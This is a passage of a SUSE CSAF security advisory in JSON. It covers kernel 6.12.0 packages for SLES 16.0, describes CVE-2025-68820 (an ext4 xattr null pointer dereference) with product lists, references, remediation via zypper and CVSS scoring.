"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
